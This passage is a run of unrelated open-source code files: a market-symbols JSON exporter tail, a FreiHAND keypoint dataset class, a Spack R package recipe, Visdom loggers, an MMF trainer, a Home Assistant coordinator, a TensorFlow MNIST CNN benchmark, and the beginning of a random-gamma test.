json.dump(market_dictionaries[market], handle, indent=4)
with open(directory_name + '/_' + directory_name + ".json", 'w') as handle:
json.dump(symbols_dictionaries, handle, indent=4)
print(f'Creating {directory_name} list..')
moneymarkets_list = {}
for moneymarket in tqdm(symbols_dictionaries):
if '.' not in moneymarket:
if symbols_dictionaries[moneymarket]['short_name'] is None:
continue
else:
moneymarkets_list[symbols_dictionaries[moneymarket]['short_name']] = moneymarket
with open(directory_name + '/_' + directory_name + " List.json", 'w') as handle:
json.dump(moneymarkets_list, handle, indent=4)
if Errors:
print("A couple of tickers were not able to be categorized. Please check the output of this function.")
return Errors
|
common/vision/datasets/keypoint_detection/freihand.py | billzhonggz/Transfer-Learning-Library | 1,474 | 11195175 | """
@author: <NAME>
@contact: <EMAIL>
"""
import json
import time
import torch
import os
import os.path as osp
from torchvision.datasets.utils import download_and_extract_archive
from ...transforms.keypoint_detection import *
from .keypoint_dataset import Hand21KeypointDataset
from .util import *
""" General util functions. """
def _assert_exist(p):
msg = 'File does not exists: %s' % p
assert os.path.exists(p), msg
def json_load(p):
_assert_exist(p)
with open(p, 'r') as fi:
d = json.load(fi)
return d
def load_db_annotation(base_path, set_name=None):
if set_name is None:
# only training set annotations are released so this is a valid default choice
set_name = 'training'
print('Loading FreiHAND dataset index ...')
t = time.time()
# assumed paths to data containers
k_path = os.path.join(base_path, '%s_K.json' % set_name)
mano_path = os.path.join(base_path, '%s_mano.json' % set_name)
xyz_path = os.path.join(base_path, '%s_xyz.json' % set_name)
# load if exist
K_list = json_load(k_path)
mano_list = json_load(mano_path)
xyz_list = json_load(xyz_path)
# should have all the same length
assert len(K_list) == len(mano_list), 'Size mismatch.'
assert len(K_list) == len(xyz_list), 'Size mismatch.'
print('Loading of %d samples done in %.2f seconds' % (len(K_list), time.time()-t))
return list(zip(K_list, mano_list, xyz_list))
def projectPoints(xyz, K):
""" Project 3D coordinates into image space. """
xyz = np.array(xyz)
K = np.array(K)
uv = np.matmul(K, xyz.T).T
return uv[:, :2] / uv[:, -1:]
""" Dataset related functions. """
def db_size(set_name):
""" Hardcoded size of the datasets. """
if set_name == 'training':
return 32560 # number of unique samples (they exists in multiple 'versions')
elif set_name == 'evaluation':
return 3960
else:
assert 0, 'Invalid choice.'
class sample_version:
gs = 'gs' # green screen
hom = 'hom' # homogenized
sample = 'sample' # auto colorization with sample points
auto = 'auto' # auto colorization without sample points: automatic color hallucination
db_size = db_size('training')
@classmethod
def valid_options(cls):
return [cls.gs, cls.hom, cls.sample, cls.auto]
@classmethod
def check_valid(cls, version):
msg = 'Invalid choice: "%s" (must be in %s)' % (version, cls.valid_options())
assert version in cls.valid_options(), msg
@classmethod
def map_id(cls, id, version):
cls.check_valid(version)
return id + cls.db_size*cls.valid_options().index(version)
class FreiHand(Hand21KeypointDataset):
"""`FreiHand Dataset <https://lmb.informatik.uni-freiburg.de/projects/freihand/>`_
Args:
root (str): Root directory of dataset
split (str, optional): The dataset split, supports ``train``, ``test``, or ``all``.
task (str, optional): The post-processing option to create dataset. Choices include ``'gs'``: green screen \
recording, ``'auto'``: auto colorization without sample points: automatic color hallucination, \
``'sample'``: auto colorization with sample points, ``'hom'``: homogenized, \
and ``'all'``: all hands. Default: 'all'.
download (bool, optional): If true, downloads the dataset from the internet and puts it \
in root directory. If dataset is already downloaded, it is not downloaded again.
transforms (callable, optional): A function/transform that takes in a dict (which contains PIL image and
its labels) and returns a transformed version. E.g, :class:`~common.vision.transforms.keypoint_detection.Resize`.
image_size (tuple): (width, height) of the image. Default: (256, 256)
heatmap_size (tuple): (width, height) of the heatmap. Default: (64, 64)
sigma (int): sigma parameter when generate the heatmap. Default: 2
.. note:: In `root`, there will exist following files after downloading.
::
*.json
training/
evaluation/
"""
def __init__(self, root, split='train', task='all', download=True, **kwargs):
if download:
if not osp.exists(osp.join(root, "training")) or not osp.exists(osp.join(root, "evaluation")):
download_and_extract_archive("https://lmb.informatik.uni-freiburg.de/data/freihand/FreiHAND_pub_v2.zip",
download_root=root, filename="FreiHAND_pub_v2.zip", remove_finished=False,
extract_root=root)
assert split in ['train', 'test', 'all']
self.split = split
assert task in ['all', 'gs', 'auto', 'sample', 'hom']
self.task = task
if task == 'all':
samples = self.get_samples(root, 'gs') + self.get_samples(root, 'auto') + self.get_samples(root, 'sample') + self.get_samples(root, 'hom')
else:
samples = self.get_samples(root, task)
random.seed(42)
random.shuffle(samples)
samples_len = len(samples)
samples_split = min(int(samples_len * 0.2), 3200)
if self.split == 'train':
samples = samples[samples_split:]
elif self.split == 'test':
samples = samples[:samples_split]
super(FreiHand, self).__init__(root, samples, **kwargs)
def __getitem__(self, index):
sample = self.samples[index]
image_name = sample['name']
image_path = os.path.join(self.root, image_name)
image = Image.open(image_path)
keypoint3d_camera = np.array(sample['keypoint3d']) # NUM_KEYPOINTS x 3
keypoint2d = np.array(sample['keypoint2d']) # NUM_KEYPOINTS x 2
intrinsic_matrix = np.array(sample['intrinsic_matrix'])
Zc = keypoint3d_camera[:, 2]
# Crop the images such that the hand is at the center of the image
# The images will be 1.5 times larger than the hand
# The crop process will change Xc and Yc, leaving Zc with no changes
bounding_box = get_bounding_box(keypoint2d)
w, h = image.size
left, upper, right, lower = scale_box(bounding_box, w, h, 1.5)
image, keypoint2d = crop(image, upper, left, lower - upper, right - left, keypoint2d)
# Change all hands to right hands
if sample['left'] is False:
image, keypoint2d = hflip(image, keypoint2d)
image, data = self.transforms(image, keypoint2d=keypoint2d, intrinsic_matrix=intrinsic_matrix)
keypoint2d = data['keypoint2d']
intrinsic_matrix = data['intrinsic_matrix']
keypoint3d_camera = keypoint2d_to_3d(keypoint2d, intrinsic_matrix, Zc)
# noramlize 2D pose:
visible = np.ones((self.num_keypoints, ), dtype=np.float32)
visible = visible[:, np.newaxis]
# 2D heatmap
target, target_weight = generate_target(keypoint2d, visible, self.heatmap_size, self.sigma, self.image_size)
target = torch.from_numpy(target)
target_weight = torch.from_numpy(target_weight)
# normalize 3D pose:
# put middle finger metacarpophalangeal (MCP) joint in the center of the coordinate system
# and make distance between wrist and middle finger MCP joint to be of length 1
keypoint3d_n = keypoint3d_camera - keypoint3d_camera[9:10, :]
keypoint3d_n = keypoint3d_n / np.sqrt(np.sum(keypoint3d_n[0, :] ** 2))
z = keypoint3d_n[:, 2]
meta = {
'image': image_name,
'keypoint2d': keypoint2d, # (NUM_KEYPOINTS x 2)
'keypoint3d': keypoint3d_n, # (NUM_KEYPOINTS x 3)
'z': z,
}
return image, target, target_weight, meta
def get_samples(self, root, version='gs'):
set = 'training'
# load annotations of this set
db_data_anno = load_db_annotation(root, set)
version_map = {
'gs': sample_version.gs,
'hom': sample_version.hom,
'sample': sample_version.sample,
'auto': sample_version.auto
}
samples = []
for idx in range(db_size(set)):
image_name = os.path.join(set, 'rgb',
'%08d.jpg' % sample_version.map_id(idx, version_map[version]))
mask_name = os.path.join(set, 'mask', '%08d.jpg' % idx)
intrinsic_matrix, mano, keypoint3d = db_data_anno[idx]
keypoint2d = projectPoints(keypoint3d, intrinsic_matrix)
sample = {
'name': image_name,
'mask_name': mask_name,
'keypoint2d': keypoint2d,
'keypoint3d': keypoint3d,
'intrinsic_matrix': intrinsic_matrix,
'left': False
}
samples.append(sample)
return samples
|
var/spack/repos/builtin/packages/r-nada/package.py | LiamBindle/spack | 2,360 | 11195178 | # Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class RNada(RPackage):
"""Nondetects and Data Analysis for Environmental Data
Contains methods described by <NAME> in his book "Nondetects And
Data Analysis: Statistics for Censored Environmental Data"."""
homepage = "https://cloud.r-project.org/package=NADA"
url = "https://cloud.r-project.org/src/contrib/NADA_1.6-1.1.tar.gz"
list_url = "https://cloud.r-project.org/src/contrib/Archive/NADA"
version('1.6-1.1', sha256='670ff6595ba074ed0a930b7a09624d5ef20616379a20e768c1a7b37332aee44a')
depends_on('[email protected]:', type=('build', 'run'))
depends_on('r-survival', type=('build', 'run'))
|
torchnet/logger/visdomlogger.py | HarshTrivedi/tnt | 1,463 | 11195179 | """ Logging to Visdom server """
import numpy as np
import visdom
from .logger import Logger
class BaseVisdomLogger(Logger):
'''
The base class for logging output to Visdom.
***THIS CLASS IS ABSTRACT AND MUST BE SUBCLASSED***
Note that the Visdom server is designed to also handle a server architecture,
and therefore the Visdom server must be running at all times. The server can
be started with
$ python -m visdom.server
and you probably want to run it from screen or tmux.
'''
@property
def viz(self):
return self._viz
def __init__(self, fields=None, win=None, env=None, opts={}, port=8097, server="localhost"):
super(BaseVisdomLogger, self).__init__(fields)
self.win = win
self.env = env
self.opts = opts
self._viz = visdom.Visdom(server="http://" + server, port=port)
def log(self, *args, **kwargs):
raise NotImplementedError(
"log not implemented for BaseVisdomLogger, which is an abstract class.")
def _viz_prototype(self, vis_fn):
''' Outputs a function which will log the arguments to Visdom in an appropriate way.
Args:
vis_fn: A function, such as self.vis.image
'''
def _viz_logger(*args, **kwargs):
self.win = vis_fn(*args,
win=self.win,
env=self.env,
opts=self.opts,
**kwargs)
return _viz_logger
def log_state(self, state):
""" Gathers the stats from self.trainer.stats and passes them into
self.log, as a list """
results = []
for field_idx, field in enumerate(self.fields):
parent, stat = None, state
for f in field:
parent, stat = stat, stat[f]
results.append(stat)
self.log(*results)
class VisdomSaver(object):
''' Serialize the state of the Visdom server to disk.
Unless you have a fancy schedule, where different are saved with different frequencies,
you probably only need one of these.
'''
def __init__(self, envs=None, port=8097, server="localhost"):
super(VisdomSaver, self).__init__()
self.envs = envs
self.viz = visdom.Visdom(server="http://" + server, port=port)
def save(self, *args, **kwargs):
self.viz.save(self.envs)
class VisdomLogger(BaseVisdomLogger):
'''
A generic Visdom class that works with the majority of Visdom plot types.
'''
def __init__(self, plot_type, fields=None, win=None, env=None, opts={}, port=8097, server="localhost"):
'''
Args:
fields: Currently unused
plot_type: The name of the plot type, in Visdom
Examples:
>>> # Image example
>>> img_to_use = skimage.data.coffee().swapaxes(0,2).swapaxes(1,2)
>>> image_logger = VisdomLogger('image')
>>> image_logger.log(img_to_use)
>>> # Histogram example
>>> hist_data = np.random.rand(10000)
>>> hist_logger = VisdomLogger('histogram', , opts=dict(title='Random!', numbins=20))
>>> hist_logger.log(hist_data)
'''
super(VisdomLogger, self).__init__(fields, win, env, opts, port, server)
self.plot_type = plot_type
self.chart = getattr(self.viz, plot_type)
self.viz_logger = self._viz_prototype(self.chart)
def log(self, *args, **kwargs):
self.viz_logger(*args, **kwargs)
class VisdomPlotLogger(BaseVisdomLogger):
def __init__(self, plot_type, fields=None, win=None, env=None, opts={}, port=8097, server="localhost", name=None):
'''
Multiple lines can be added to the same plot with the "name" attribute (see example)
Args:
fields: Currently unused
plot_type: {scatter, line}
Examples:
>>> scatter_logger = VisdomPlotLogger('line')
>>> scatter_logger.log(stats['epoch'], loss_meter.value()[0], name="train")
>>> scatter_logger.log(stats['epoch'], loss_meter.value()[0], name="test")
'''
super(VisdomPlotLogger, self).__init__(fields, win, env, opts, port, server)
valid_plot_types = {
"scatter": self.viz.scatter,
"line": self.viz.line}
self.plot_type = plot_type
# Set chart type
if plot_type not in valid_plot_types.keys():
raise ValueError("plot_type \'{}\' not found. Must be one of {}".format(
plot_type, valid_plot_types.keys()))
self.chart = valid_plot_types[plot_type]
def log(self, *args, **kwargs):
if self.win is not None and self.viz.win_exists(win=self.win, env=self.env):
if len(args) != 2:
raise ValueError("When logging to {}, must pass in x and y values (and optionally z).".format(
type(self)))
x, y = args
self.chart(
X=np.array([x]),
Y=np.array([y]),
update='append',
win=self.win,
env=self.env,
opts=self.opts,
**kwargs)
else:
if self.plot_type == 'scatter':
chart_args = {'X': np.array([args])}
else:
chart_args = {'X': np.array([args[0]]),
'Y': np.array([args[1]])}
self.win = self.chart(
win=self.win,
env=self.env,
opts=self.opts,
**chart_args)
# For some reason, the first point is a different trace. So for now
# we can just add the point again, this time on the correct curve.
self.log(*args, **kwargs)
class VisdomTextLogger(BaseVisdomLogger):
'''Creates a text window in visdom and logs output to it.
The output can be formatted with fancy HTML, and it new output can
be set to 'append' or 'replace' mode.
Args:
fields: Currently not used
update_type: One of {'REPLACE', 'APPEND'}. Default 'REPLACE'.
For examples, make sure that your visdom server is running.
Example:
>>> notes_logger = VisdomTextLogger(update_type='APPEND')
>>> for i in range(10):
>>> notes_logger.log("Printing: {} of {}".format(i+1, 10))
# results will be in Visdom environment (default: http://localhost:8097)
'''
valid_update_types = ['REPLACE', 'APPEND']
def __init__(self, fields=None, win=None, env=None, opts={}, update_type=valid_update_types[0],
port=8097, server="localhost"):
super(VisdomTextLogger, self).__init__(fields, win, env, opts, port, server)
self.text = ''
if update_type not in self.valid_update_types:
raise ValueError("update type '{}' not found. Must be one of {}".format(
update_type, self.valid_update_types))
self.update_type = update_type
self.viz_logger = self._viz_prototype(self.viz.text)
def log(self, msg, *args, **kwargs):
text = msg
if self.update_type == 'APPEND' and self.text:
self.text = "<br>".join([self.text, text])
else:
self.text = text
self.viz_logger([self.text])
def _log_all(self, stats, log_fields, prefix=None, suffix=None, require_dict=False):
results = []
for field_idx, field in enumerate(self.fields):
parent, stat = None, stats
for f in field:
parent, stat = stat, stat[f]
name, output = self._gather_outputs(field, log_fields,
parent, stat, require_dict)
if not output:
continue
self._align_output(field_idx, output)
results.append((name, output))
if not results:
return
output = self._join_results(results)
if prefix is not None:
self.log(prefix)
self.log(output)
if suffix is not None:
self.log(suffix)
def _align_output(self, field_idx, output):
for output_idx, o in enumerate(output):
if len(o) < self.field_widths[field_idx][output_idx]:
num_spaces = self.field_widths[field_idx][output_idx] - len(o)
output[output_idx] += ' ' * num_spaces
else:
self.field_widths[field_idx][output_idx] = len(o)
def _join_results(self, results):
joined_out = map(lambda i: (i[0], ' '.join(i[1])), results)
joined_fields = map(lambda i: '{}: {}'.format(i[0], i[1]), joined_out)
return '\t'.join(joined_fields)
def _gather_outputs(self, field, log_fields, stat_parent, stat, require_dict=False):
output = []
name = ''
if isinstance(stat, dict):
log_fields = stat.get(log_fields, [])
name = stat.get('log_name', '.'.join(field))
for f in log_fields:
output.append(f.format(**stat))
elif not require_dict:
name = '.'.join(field)
number_format = stat_parent.get('log_format', '')
unit = stat_parent.get('log_unit', '')
fmt = '{' + number_format + '}' + unit
output.append(fmt.format(stat))
return name, output
|
mmf/trainers/mmf_trainer.py | sisilmehta2000/mmf | 3,252 | 11195200 | <filename>mmf/trainers/mmf_trainer.py
# Copyright (c) Facebook, Inc. and its affiliates.
import logging
import warnings
import omegaconf
import torch
from mmf.common.registry import registry
from mmf.datasets.multi_datamodule import MultiDataModule
from mmf.modules.metrics import Metrics
from mmf.trainers.base_trainer import BaseTrainer
from mmf.trainers.callbacks.checkpoint import CheckpointCallback
from mmf.trainers.callbacks.early_stopping import EarlyStoppingCallback
from mmf.trainers.callbacks.logistics import LogisticsCallback
from mmf.trainers.callbacks.lr_scheduler import LRSchedulerCallback
from mmf.trainers.core.callback_hook import TrainerCallbackHookMixin
from mmf.trainers.core.device import TrainerDeviceMixin
from mmf.trainers.core.evaluation_loop import TrainerEvaluationLoopMixin
from mmf.trainers.core.profiling import TrainerProfilingMixin
from mmf.trainers.core.training_loop import TrainerTrainingLoopMixin
from mmf.utils.build import build_model, build_optimizer
from mmf.utils.general import print_model_parameters
from omegaconf import DictConfig, OmegaConf
from packaging import version
logger = logging.getLogger(__name__)
@registry.register_trainer("mmf")
class MMFTrainer(
TrainerCallbackHookMixin,
TrainerTrainingLoopMixin,
TrainerDeviceMixin,
TrainerEvaluationLoopMixin,
TrainerProfilingMixin,
BaseTrainer,
):
def __init__(self, config: DictConfig):
super().__init__(config)
def load(self):
super().load()
self.load_fp16_scaler()
# Callbacks
self.on_init_start()
# Parallize model
self.parallelize_model()
# Callbacks
self.on_init_end()
def configure_callbacks(self):
self.checkpoint_callback = CheckpointCallback(self.config, self)
self.early_stop_callback = EarlyStoppingCallback(self.config, self)
self.logistics_callback = LogisticsCallback(self.config, self)
self.lr_scheduler_callback = LRSchedulerCallback(self.config, self)
# Reset callbacks as they are class variables and would be shared between
# multiple interactive shell calls to `run`
self.callbacks = []
# Add callbacks for execution during events
self.callbacks.append(self.lr_scheduler_callback)
# checkpoint_callback needs to be called after lr_scheduler_callback so that
# lr_scheduler_callback._scheduler.step() happens before saving checkpoints
# (otherwise the saved last_epoch in scheduler would be wrong)
self.callbacks.append(self.checkpoint_callback)
self.callbacks.append(self.logistics_callback)
# Add all customized callbacks defined by users
for callback in self.config.training.get("callbacks", []):
callback_type = callback.type
callback_param = callback.params
callback_cls = registry.get_callback_class(callback_type)
self.callbacks.append(callback_cls(self.config, self, **callback_param))
def load_datasets(self):
logger.info("Loading datasets")
self.dataset_loader = MultiDataModule(self.config)
self.train_loader = self.dataset_loader.train_dataloader()
self.val_loader = self.dataset_loader.val_dataloader()
self.test_loader = self.dataset_loader.test_dataloader()
def load_model(self):
logger.info("Loading model")
if self.config.model in self.config.model_config:
attributes = self.config.model_config[self.config.model]
else:
warnings.warn(
f"Model {self.config.model}'s config not present. "
+ "Continuing with empty config"
)
attributes = OmegaConf.create()
# Easy way to point to config for other model
if isinstance(attributes, str):
attributes = self.config.model_config[attributes]
with omegaconf.open_dict(attributes):
attributes.model = self.config.model
self.model = build_model(attributes)
self.model = self.model.to(self.device)
def load_optimizer(self):
logger.info("Loading optimizer")
self.optimizer = build_optimizer(self.model, self.config)
def load_metrics(self) -> None:
logger.info("Loading metrics")
metrics = self.config.evaluation.get("metrics", [])
self.metrics = Metrics(metrics)
self.metrics_params = self.metrics.required_params
def load_fp16_scaler(self):
if self.training_config.fp16:
assert version.parse(torch.__version__) >= version.parse(
"1.6"
), f"Using fp16 requires torch version >- 1.6, found: {torch.__version__}"
assert self.device != torch.device("cpu"), "fp16 cannot be used on cpu"
set_torch_grad_scaler = True
if self.training_config.fp16 and self.distributed:
try:
from fairscale.optim.grad_scaler import ShardedGradScaler
from fairscale.optim.oss import OSS
if isinstance(self.optimizer, OSS):
self.scaler = ShardedGradScaler()
set_torch_grad_scaler = False
logger.info("Using FairScale ShardedGradScaler")
except ImportError:
logger.info("Using Pytorch AMP GradScaler")
if set_torch_grad_scaler:
self.scaler = torch.cuda.amp.GradScaler(enabled=self.training_config.fp16)
def train(self):
logger.info("===== Model =====")
logger.info(self.model)
print_model_parameters(self.model)
if "train" in self.run_type:
self.on_train_start()
self.training_loop()
self.on_train_end()
self.inference()
self.finalize()
def inference(self):
dataset_type = []
if "val" in self.run_type:
dataset_type.append("val")
if any(rt in self.run_type for rt in ["inference", "test", "predict"]):
dataset_type.append("test")
for dataset in dataset_type:
if self.config.evaluation.predict:
self.on_prediction_start()
self.prediction_loop(dataset)
self.on_prediction_end()
else:
self.on_test_start()
logger.info(f"Starting inference on {dataset} set")
report, meter = self.evaluation_loop(dataset, use_tqdm=True)
self.on_test_end(report=report, meter=meter)
def finalize(self):
self.dataset_loader.teardown()
self.teardown()
|
homeassistant/components/steamist/coordinator.py | MrDelik/core | 30,023 | 11195207 | """DataUpdateCoordinator for steamist."""
from __future__ import annotations
from datetime import timedelta
import logging
from aiosteamist import Steamist, SteamistStatus
from homeassistant.core import HomeAssistant
from homeassistant.helpers.update_coordinator import DataUpdateCoordinator
_LOGGER = logging.getLogger(__name__)
class SteamistDataUpdateCoordinator(DataUpdateCoordinator[SteamistStatus]):
"""DataUpdateCoordinator to gather data from a steamist steam shower."""
def __init__(
self,
hass: HomeAssistant,
client: Steamist,
host: str,
device_name: str | None,
) -> None:
"""Initialize DataUpdateCoordinator to gather data for specific steamist."""
self.client = client
self.device_name = device_name
super().__init__(
hass,
_LOGGER,
name=f"Steamist {host}",
update_interval=timedelta(seconds=5),
)
async def _async_update_data(self) -> SteamistStatus:
"""Fetch data from steamist."""
return await self.client.async_get_status()
|
src/out/ICFP18evaluation/evaluationCNN/TensorFlow/TensorFlow.py | faradaym/Lantern | 158 | 11195218 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A deep MNIST classifier using convolutional layers.
See extensive documentation at
https://www.tensorflow.org/get_started/mnist/pros
"""
# Disable linter warnings to maintain consistency with tutorial.
# pylint: disable=invalid-name
# pylint: disable=g-bad-import-order
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import sys
import tempfile
import time
from tensorflow.examples.tutorials.mnist import input_data
import tensorflow as tf
#FLAGS = None
def deepnn(x):
"""deepnn builds the graph for a deep net for classifying digits.
Args:
x: an input tensor with the dimensions (N_examples, 784), where 784 is the
number of pixels in a standard MNIST image.
Returns:
A tuple (y, keep_prob). y is a tensor of shape (N_examples, 10), with values
equal to the logits of classifying the digit into one of 10 classes (the
digits 0-9). keep_prob is a scalar placeholder for the probability of
dropout.
"""
# Reshape to use within a convolutional neural net.
# Last dimension is for "features" - there is only one here, since images are
# grayscale -- it would be 3 for an RGB image, 4 for RGBA, etc.
with tf.name_scope('reshape'):
x_image = tf.reshape(x, [-1, 28, 28, 1])
# First convolutional layer - maps one grayscale image to 32 feature maps.
with tf.name_scope('conv1'):
W_conv1 = weight_variable([5, 5, 1, 10])
h_conv1 = tf.nn.relu(conv2d(x_image, W_conv1))
# Pooling layer - downsamples by 2X.
with tf.name_scope('pool1'):
h_pool1 = max_pool_2x2(h_conv1)
# Second convolutional layer -- maps 32 feature maps to 64.
with tf.name_scope('conv2'):
W_conv2 = weight_variable([5, 5, 10, 20])
h_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2))
# Second pooling layer.
with tf.name_scope('pool2'):
h_pool2 = max_pool_2x2(h_conv2)
# Fully connected layer 1 -- after 2 round of downsampling, our 28x28 image
# is down to 7x7x64 feature maps -- maps this to 1024 features.
with tf.name_scope('fc1'):
W_fc1 = weight_variable([4 * 4 * 20, 50])
b_fc1 = bias_variable([50])
h_pool2_flat = tf.reshape(h_pool2, [-1, 4 * 4 * 20])
h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1)
# Dropout - controls the complexity of the model, prevents co-adaptation of
# features.
with tf.name_scope('dropout'):
keep_prob = tf.placeholder(tf.float32)
h_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)
# Map the 1024 features to 10 classes, one for each digit
with tf.name_scope('fc2'):
W_fc2 = weight_variable([50, 10])
b_fc2 = bias_variable([10])
y_conv = tf.matmul(h_fc1_drop, W_fc2) + b_fc2
return y_conv, keep_prob
def conv2d(x, W):
"""conv2d returns a 2d convolution layer with full stride."""
return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='VALID')
def max_pool_2x2(x):
"""max_pool_2x2 downsamples a feature map by 2X."""
return tf.nn.max_pool(x, ksize=[1, 2, 2, 1],
strides=[1, 2, 2, 1], padding='SAME')
def weight_variable(shape):
"""weight_variable generates a weight variable of a given shape."""
initial = tf.truncated_normal(shape, stddev=0.1)
return tf.Variable(initial)
def bias_variable(shape):
"""bias_variable generates a bias variable of a given shape."""
initial = tf.constant(0.1, shape=shape)
return tf.Variable(initial)
def run(write_to):
print("this is the start of reading data")
startTime = time.time()
# Import data
mnist = input_data.read_data_sets(args.data_dir)
# Create the model
x = tf.placeholder(tf.float32, [None, 784])
# Define loss and optimizer
y_ = tf.placeholder(tf.int64, [None])
# Build the graph for the deep net
y_conv, keep_prob = deepnn(x)
with tf.name_scope('loss'):
cross_entropy = tf.losses.sparse_softmax_cross_entropy(
labels=y_, logits=y_conv)
cross_entropy = tf.reduce_mean(cross_entropy)
with tf.name_scope('adam_optimizer'):
train_step = tf.train.GradientDescentOptimizer(args.lr).minimize(cross_entropy)
with tf.name_scope('accuracy'):
correct_prediction = tf.equal(tf.argmax(y_conv, 1), y_)
correct_prediction = tf.cast(correct_prediction, tf.float32)
accuracy = tf.reduce_mean(correct_prediction)
#graph_location = tempfile.mkdtemp()
#print('Saving graph to: %s' % graph_location)
#train_writer = tf.summary.FileWriter(graph_location)
#train_writer.add_graph(tf.get_default_graph())
loopStart = time.time()
loss_save = []
with tf.Session(config=tf.ConfigProto(
intra_op_parallelism_threads=1,
inter_op_parallelism_threads=1)) as sess:
sess.run(tf.global_variables_initializer())
for epoch in range(args.epochs):
train_accuracy = 0.0
start = time.time() * 1000
for i in range(60000 // args.batch_size):
batch = mnist.train.next_batch(args.batch_size)
_, loss = sess.run([train_step, cross_entropy], feed_dict={x: batch[0], y_: batch[1], keep_prob: 0.5})
#print(loss)
train_accuracy += loss
#if (i + 1) % 60 == 0:
# print('epoch %d: step %d, training loss %f' % (epoch + 1, i + 1, train_accuracy / (i * 100)))
stop = time.time() * 1000
print('Training completed in {}ms ({}ms/image)'.format(int(stop - start), (stop - start)/60000))
average_loss = train_accuracy / (60000 / args.batch_size)
print('average loss is %s' % average_loss)
loss_save.append(average_loss)
#start = time.time() * 1000
#tloss = 0
#tacc = 0
#for i in range(100):
# batch = mnist.test.next_batch(100)
# loss, acc = sess.run([cross_entropy, accuracy], feed_dict={
# x: batch[0], y_: batch[1], keep_prob: 1.0})
# tloss += loss
# tacc += acc
#stop = time.time() * 1000
#print('Epoch %d: test accuracy %d/10000. Average loss %f' % (epoch + 1, tacc, tloss / 10000))
#print('Testing completed in {}ms ({}ms/image)'.format(int(stop - start), (stop - start)/10000))
loopEnd = time.time()
prepareTime = loopStart - startTime
loopTime = loopEnd - loopStart
timePerEpoch = loopTime / args.epochs
with open(write_to, "w") as f:
f.write("unit: " + "1 epoch\n")
for loss in loss_save:
f.write(str(loss) + "\n")
f.write("run time: " + str(prepareTime) + " " + str(timePerEpoch) + "\n")
if __name__ == '__main__':
# Training settings
parser = argparse.ArgumentParser(description='PyTorch MNIST Example')
parser.add_argument('--batch-size', type=int, default=100, metavar='N',
help='input batch size for training (default: 64)')
parser.add_argument('--test-batch-size', type=int, default=1000, metavar='N',
help='input batch size for testing (default: 1000)')
parser.add_argument('--epochs', type=int, default=10, metavar='N',
help='number of epochs to train (default: 10)')
parser.add_argument('--lr', type=float, default=0.05, metavar='LR',
help='learning rate (default: 0.01)')
parser.add_argument('--momentum', type=float, default=0.0, metavar='M',
help='SGD momentum (default: 0.5)')
parser.add_argument('--no-cuda', action='store_true', default=False,
help='disables CUDA training')
parser.add_argument('--seed', type=int, default=42, metavar='S',
help='random seed (default: 1)')
parser.add_argument('--log-interval', type=int, default=6000, metavar='N',
help='how many batches to wait before logging training status')
parser.add_argument('--data_dir', type=str,
default='./input_data',
help='Directory for storing input data')
args = parser.parse_args()
import os
if not os.path.exists(args.data_dir):
# only try to download the data here
input_data.read_data_sets(args.data_dir)
run("result_TensorFlow"+str(args.batch_size)+".txt")
#if __name__ == '__main__':
# parser = argparse.ArgumentParser()
# parser.add_argument('--data_dir', type=str,
# default='/tmp/tensorflow/mnist/input_data',
## help='Directory for storing input data')
# FLAGS, unparsed = parser.parse_known_args()
# tf.app.run(main=main, argv=[sys.argv[0]] + unparsed) |
jni-build/jni/include/tensorflow/python/kernel_tests/random_gamma_test.py | rcelebi/android-elfali | 680 | 11195234 | <filename>jni-build/jni/include/tensorflow/python/kernel_tests/random_gamma_test.py
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.random_ops.random_gamma."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
import tensorflow as tf
class RandomGammaTest(tf.test.TestCase):
"""This is a medium test due to the moments computation taking some time."""
def _Sampler(self, num, alpha, beta, dtype, use_gpu, seed=None):
def func():
with self.test_session(use_gpu=use_gpu, graph=tf.Graph()) as sess:
rng = tf.random_gamma([num], alpha, beta=beta, dtype=dtype, seed=seed)
ret = np.empty([10, num])
for i in xrange(10):
ret[i, :] = sess.run(rng)
return ret
return func
"""
We are not currently allowing scipy in core TF tests.
def testMoments(self):
try:
from scipy import stats # pylint: disable=g-import-not-at-top
z_limit = 6.0
for dt in tf.float16, tf.float32, tf.float64:
for stride in 0, 1, 4, 17:
for alpha in .5, 3.:
for scale in 11, 21:
# Gamma moments only defined for values less than the scale param.
max_moment = scale // 2
sampler = self._Sampler(1000,
alpha,
1 / scale,
dt,
use_gpu=False,
seed=12345)
moments = [0] * (max_moment + 1)
moments_sample_count = [0] * (max_moment + 1)
x = np.array(sampler().flat) # sampler does 10x samples
for k in range(len(x)):
moment = 1.
for i in range(max_moment + 1):
index = k + i * stride
if index >= len(x):
break
moments[i] += moment
moments_sample_count[i] += 1
moment *= x[index]
for i in range(max_moment + 1):
moments[i] /= moments_sample_count[i]
for i in range(1, max_moment + 1):
g = stats.gamma(alpha, scale=scale)
if stride == 0:
moments_i_mean = g.moment(i)
moments_i_squared = g.moment(2 * i)
else:
moments_i_mean = pow(g.moment(1), i)
moments_i_squared = pow(g.moment(2), i)
moments_i_var = (
moments_i_squared - moments_i_mean * moments_i_mean)
# Assume every operation has a small numerical error.
